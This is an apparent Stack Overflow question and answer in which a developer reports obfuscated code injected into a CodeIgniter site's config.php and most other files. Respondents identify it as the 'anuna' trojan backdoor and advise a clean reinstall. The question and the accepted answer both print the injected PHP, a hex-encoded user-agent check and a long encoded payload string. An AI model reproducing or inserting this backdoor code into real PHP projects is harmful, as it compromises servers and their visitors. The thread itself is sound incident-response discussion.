# Weird and unusual characters in source code -PHP

Tags: php

Few months ago I created a site in Codeigniter and uploaded it to live server.Its working fine until the owner instructed me to perform some updates on files on that site.I backup and set up that site in my local machine, and I noticed that many extra weird characters now included in many of the files source code.An example is the config.php file

```
      <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $nqzonxuuvd = '85csboe))1%x5c%x782f35.)x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QU-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y325fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]27;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%%x782f!**#sfmcnbs+yfeobz+sfwjidsb%1]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3e]81#%x5c%x782f#7e7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x7("%x2f%50%x2e%52%x29%57%x6%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x225c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%xx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5crr)%x5c%x7825r%x5c%x7x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985tjyf%x5c%x7860%x5c%x7878%x~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osgj6<*doj%x5c%x78257-C)fepmqnjA%x5o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x78#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7824-tusqpt)%x5c%x7825z-#:#*74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx7824<%x5c%x7825j,,*!|%xc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7825bss-%x5c%x7825r%x5c8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*Q]y33]65]y31]55]y85]82]x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutx5c%x7825)}.;%x5c%x7860UQPMSVD!-*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c5c%x7825:>:r%x5c%x7825:|:**t%xjyf%x5c%x78604%x5c%x78g39*56A:>:8:|:7#6#)tutjyfx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)s#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)4%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74],#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%xW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825c%x7825-
```

Originally, my config.php file looks like this

```
    <?php
      defined('BASEPATH') OR exit('No direct script access allowed');
```

This site still working except some error notice (deprecated notice in PHP) since this site uses older version of PHP, which can be turn off by tweaking php.ini file.

Any idea what's going on?

Comment: I believe this site was hacked and this is obscured backdoor.

Comment: Ask the site owner about the changes. If they have no idea about it then their account may have been compromised. In that case you simply tell them to change their password and you upload your local working copy of that file onto the server and make new changes to that file.

Comment: @Rolen Koh, is there any ways to delete those unwanted characters?, 90 percent of files is 'infected' with that unwanted characters

Answer (score 0, accepted):

### Here's a bit readable version of the code :

```
<?php 
    if(!isset($GLOBALS["anuna"])) { 
        $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); 
        if ((! strstr($ua,"msie")) and (! strstr($ua,"rv:11"))) 
            $GLOBALS["anuna"] = 1; 
    }
?>
<?php 
    $nqzonxuuvd = '85csboe))1%x5c%x782f35.)x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QU-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y325fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]27;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%%x782f!**#sfmcnbs+yfeobz+sfwjidsb%1]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3e]81#%x5c%x782f#7e7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x7("%x2f%50%x2e%52%x29%57%x6%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x%x2c%163%x74%162%x5f%163%x70%154%x69%164%50%x225c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%xx787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5crr)%x5c%x7825r%x5c%x7x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985tjyf%x5c%x7860%x5c%x7878%x~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osgj6<*doj%x5c%x78257-C)fepmqnjA%x5o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x78#Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7824-tusqpt)%x5c%x7825z-#:#*74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x782c%x7827!hmg%x5c%x7825)!gj!<2,*j%xx7824<%x5c%x7825j,,*!|%xc%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7825bss-%x5c%x7825r%x5c8256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*Q]y33]65]y31]55]y85]82]x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutx5c%x7825)}.;%x5c%x7860UQPMSVD!-*b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c5c%x7825:>:r%x5c%x7825:|:**t%xjyf%x5c%x78604%x5c%x78g39*56A:>:8:|:7#6#)tutjyfx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)s#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)4%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*1x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74],#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%xW%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825c%x7825-
```

The `anuna` mentioned in the 2nd line of this code is a trojan backdoore. You can read technical details and what it [here](https://www.symantec.com/security_response/writeup.jsp?docid=2015-111911-4342-99&tabid=2).

### In short...

You've been hacked. You should probably change passwords, see logs of the server and upload a fresh copy of the website.

Comment: Is there any way to clean this site, is running a paid anti virus program is enough for this?

Comment: I'm sorry, I don't have much information about that but as I said in the answer, I'd look into replacing the whole website with an non-infected copy and find the vulnerability.

Comment: If the server was poorly secured (like running www server by privileged user), there's also a chance that operating system was compromised. I wouldn't take any chances and would install whole system from scratch (leave the hacked one aside for analysis).

Comment: @DanielleRoseMabunga http://security.stackexchange.com/ would probably be more helpful.

Comment: @DanielleRoseMabunga asked `Is there any way to clean this site, is running a paid anti virus program is enough for this?` Usually, no. Those seem to be automated attacks, that uses robots to probe the internet, and try some common failures to inject itself in the server, it then replicates, and opens backdoors so that the robot "owner" can use it.... since its likely the attacker has control over it, it is possible he made "re-installs" ready, if its programs are altered.